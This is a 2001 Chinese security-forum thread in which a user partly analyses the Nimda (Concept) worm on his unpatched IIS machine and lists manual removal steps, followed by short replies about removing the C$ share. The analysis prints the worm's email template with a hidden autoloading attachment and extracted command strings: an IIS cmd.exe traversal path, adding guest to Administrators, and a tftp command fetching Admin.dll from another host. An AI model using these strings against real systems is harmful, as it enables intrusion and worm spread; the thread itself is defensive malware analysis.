这是在 20CN网络安全小组第一代论坛 的论坛 安全漏洞 中的主题 尼姆达(概念)蠕虫-不完全分析


要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=3;t=000324
TomyChen (编号: 16) 发表于 :
 
[quote]前些天和朋友调试ASP,故把IIS打开了(俺懒IIS的一个补丁都没打上),后来忘了关掉,

拔号上网,没多久后网速变得非常慢,CPU为100%。我已经感觉到什么了,打开各个分区查看,

发现了C、D、E中分别存在着 admin.dll readme.eml 这两个文件,看到*.eml我就知道是蠕虫咯

于是,做出了以下分析:

MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add


/scripts
/winnt/system32/cmd.exe?/c+

net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20

<html><script language="JavaScript">window.open("readme.eml", null,

"resizable=no,top=6000,left=6000")</script></html>
受感染的机子会通过IE进行传播,通过调用cmd.exe tftp.exe net.exe net1.exe等系统程序来达到散播的目的。
------------------------------------------------------------------------------------
手动清除病毒的方法:
1、打开进程管理器,查看进程列表;
   2、结束其中进程名称为“xxx.tmp.exe”以及“Load.exe”的进程(其中xxx为任意文件名);
   3、切换到系统的TEMP目录,寻找文件长度为57344的文件,删掉它们;
   4、切换到系统的System目录,寻找名称为Riched20.DLL的文件;
   5、查看Riched20.DLL的文件大小,系统的正常文件大小应该在100K以上,而Concept病毒的副本大小为57344字节,如果有长度为57344字节的R iched20.DLL,删掉它;
   6、继续在系统的System目录下寻找名称为load.exe、长度为57344字节的文件,删掉它;
   7、在C:\、D:\、E:\三个逻辑盘的根目录下寻找Admin.DLL文件,如果在根目录下存在该文件,则删除它;
   8、打开System.ini文件,在[load]中如果有一行“shell=explorer.exe load.exe -dontrunold”,则改为“shell=explorer.exe”;
   9、如果是WinNT或者Win2000以及WinXP系统,则打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除;
   10、打开共享文件夹管理,将共享“C$”去除,该共享为本地C:\的完全共享;
   11、搜索整个机器,查找文件名为Readme.eml的文件,如果文件内容中包含
      “<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff><br>
   <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0><br>
   </iframe></BODY></HTML> ”
   以及
   “Content-Type: audio/x-wav;
   name="readme.exe"
   Content-Transfer-Encoding: base64
   ”,则删掉该文件。
------------------------------------------------------------------------------------
[/quote]

由于个别因素,完全分析要过些日子:)

[ 09-20-2001: 贴子编辑者: TomyChen ]

[ 09-20-2001: 贴子编辑者: TomyChen ]
 

TomyChen (编号: 16) 发表于 :
 
忘了,声明一点,要把Guest用户禁用和把C盘共享去掉。
 
朗月清风 (编号: 2406) 发表于 :
 
问一个菜问题![b]“打开共享文件夹管理,将共享“C$”去除,该共享为本地C:\的完全共享; ”[/b]
这一步如何实现?
  
 
TomyChen (编号: 16) 发表于 :
 
faint~~
右键点击该盘符,选择共享。在里面把共享去掉
 
朗月清风 (编号: 2406) 发表于 :
 
谢谢!问题在于我的右键里没有!怎么办?
 




Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。